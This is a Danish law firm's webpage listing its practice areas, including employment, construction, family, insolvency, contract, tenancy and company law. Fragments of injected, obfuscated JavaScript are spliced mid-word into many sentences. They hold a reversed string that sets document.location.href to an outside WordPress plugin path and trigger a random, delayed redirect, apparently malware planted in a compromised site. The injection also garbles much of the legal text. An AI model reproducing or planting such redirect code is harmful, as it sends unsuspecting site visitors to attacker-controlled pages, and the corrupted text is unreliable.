Forretningsområder

Ansættelsesret.

Meldgaard Advokatfirma yder rådgivning og bistand til virksomheder og arbejdstagere ved alle ansættelsesretlige problemstillinger, herunder:

 • Funktionærret
 • Bortvisning/opsigelse af medarbejdere.
 • Ligestillingsloven, herunder regler under sygdom, graviditet og barsel.
 • Konkurrence og kundeklausuler.
 • Udarbejdelse af ansættelsesbeviser og direktørkontrakter.
 • Lønmodtagernes retsstilling ved virksomhedsoverdragelse.

Entrepriseret.

Meldgaard Advokatfirma rådgiver både bygherrer og entreprenører i forbindelse med indgåelse af entrepriser og bistår også gerne til at løse eventuelle opståede konflikter.

Vi rådgiver blandt andet omkring:

 • Udarbejdelse og gennemgang af entreprisekontrakter.
 • Ejendoms- og projektudvikling.
 • Førelse af sager ved Voldgiftsnævnet for Bygge- og Anlæg og de almindelige domstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tole.
 • Konfliktløsning, herunder gennemførelse af syn og skøn og sagkyndige beslutninger om træk på garantier.
 • Gennemførelse af stadeopgørelse i forbindelse med ophævelse af entreprisekontrakter.

Familieret.

Meldgaard Advokatfirma rådgiver inden for alle familierettens områder såsom:

 • Separation og skilsmisse.
 • Udarbejdelse af bodelingsoverenskomster.
 • Ugifte samlevende.
 • Udarbejdelse af ægtepagter.
 • Rettigheder til samvær med børn.
 • Rådgivning i forbindelse med forældremyndighed.
 • Oprettelse af testamenter.
 • Behandling af dødsboer.

Inkasso.

Meldgaard Advokatfirma yder rådgivning og bistand til inkassation virksomheders og privates tilgodehavender.

Vi er RKI inkassopartner.

Insolvensret.

Meldgaard Advokatfirma har stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor erfaring med rådgivning til såvel den nødlidende virksomhed som til de kreditoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torer og medarbejdere, som har penge til gode hos den nødlidende virksomhed.

Rådgivningen kan blandt andet omfatte:

 • Rekonstruktion.
 • Konkurs.
 • Gældssanering.
 • Anmeldelse af lønmodtagerkrav til Lønmodtagernes Garantifond.

Som rådgiver for den nødlidende virksomhed foretager vi hos Meldgaard Advokatfirma en analyse af, om virksomheden kan reddes ved rekonstruktion herunder evt. en frivillig akkordordning eller, om den skal afvikles. Det bedste for virksomhedens interessenter og samfundet er naturligvis, hvis virksomheden kan reddes, og derfor vil Meldgaard Advokatfirma vurdere alle muligheder herfor før anmeldelse om konkurs sendes til skifteretten.

Kontraktsret.

Uanset om du skal udarbejde en kontrakt, eller om du skal underskrive en kontrakt er Meldgaard Advokatfirma klar til at yde dig rådgivning på højt niveau. Vi har erfaringen og den nødvendige viden, der kan sikre dig en velfungerende kontrakt. Desuden har vi stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor erfaring med de forhandlinger, der kan knytte sig til indgåelse af en kontrakt.

Der er stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor forskel på kontrakter, og her er et lille udpluk af de kontrakter vi arbejder med:

 • Lejekontrakter.
 • Køb- og salg af fast ejendom.
 • Samejeoverenskomster.
 • Ægtepagter og samlivskontrakter.
 • Finansielle kontrakter.
 • Ansættelsesaftaler.
 • Ejeraftaler – det der tidligere hed aktionæroverenskomster/anpartshaveroverenskomster.

Køb og salg af fast ejendom.

Meldgaard Advokatfirma rådgiver omkring alle aspekter i forbindelse med køb/salg af fast ejendom uanset om handlen gennemføres med eller uden ejendomsmægler.

Rådgivningen omfatter alle problemstillinger i relation til:

 • Gennemgang af købsaftale og tilhørende bilag, herunder:
  • Tilstands- og elinstallationsrapporter.
  • Energimærkningsrapport.
  • Hus- og ejerskifteforsikring.
  • Rådgivning omkring finansiering.
  • Ejerforeninger og grundejerforeninger.
  • Digital tinglysning.
  • Refusionsopgørelse.
  • Mangler

Lejeret.

Meldgaard Advokatfirma yder rådgivning vedrørende alle former for leje­forhold, herunder både erhvervs- og boliglejemål.

På lejeområdet yder vi blandt andet bistand i forbindelse med:

 • Forhandling og udarbejdelse af lejekontrakter.
 • Varsling og gennemførelse af lejereguleringer.
 • Opsigelse og ophævelse af lejemål.
 • Fogedudsættelser.
 • Fraflytningsopgørelser.

Endvidere har vi stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor erfaring med håndtering af tvister om lejeforhold ved huslejenævn, boligretten og domstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolene.

Personskadesager.

Meldgaard Advokatfirma bistår skadelidte over for eget forsikringsselskab og en eventuel ansvarlig skadevolder og sikrer, at skadelidte opnår den erstatning som skadelidte er berettiget til.

Den skadelidte og forsikringsselskabet har i princippet modsatrettede interesser. Det er derfor en god ide, at få en advokat til at føre sagen, hvis man vil være sikker på at få den erstatning, man er berettiget til.

Ofte vil der også være mulighed for helt eller delvist at få dækket sine udgifter til advokatbistand fra forsikringsselskabet.

Rets- og voldgiftsager.

Meldgaard Advokatfirma har stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor erfaring i at føre sager ved de danske domstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tole og voldgiftsretten.

Den juridiske rådgivning omfatter blandt andet:

 • En juridisk vurdering af sagen forud for sagens anlæg.
 • Forligsovervejelser og forligsforhandlinger.
 • Eventuel deltagelse i retsmægling.
 • Sagsøkonomi, herunder mulighed for retshjælp eller fri proces.
 • Tilrettelæggelse af bevisførelsen herunder gennemførelse af syn og skøn.
 • Førelse af hovedforhandling.

Selskabsret.

Meldgaard Advokatfirma rådgiver inden for alle selskabsretlige områder og bistår med udarbejdelse af alle former for selskabsretlige dokumenter.

Den juridiske rådgivning kan blandt andet omfatte:

 • Valg af selskabsform.
 • Stiftelse af selskaber og udarbejdelse af ejeraftaler.
 • Deltagelse i generalforsamlinger som dirigent.
 • Fusion, spaltning eller omdannelse af selskaber.
 • Gennemførelse af generationsskifte.
 • Likvidation af både solvente og insolvente selskaber.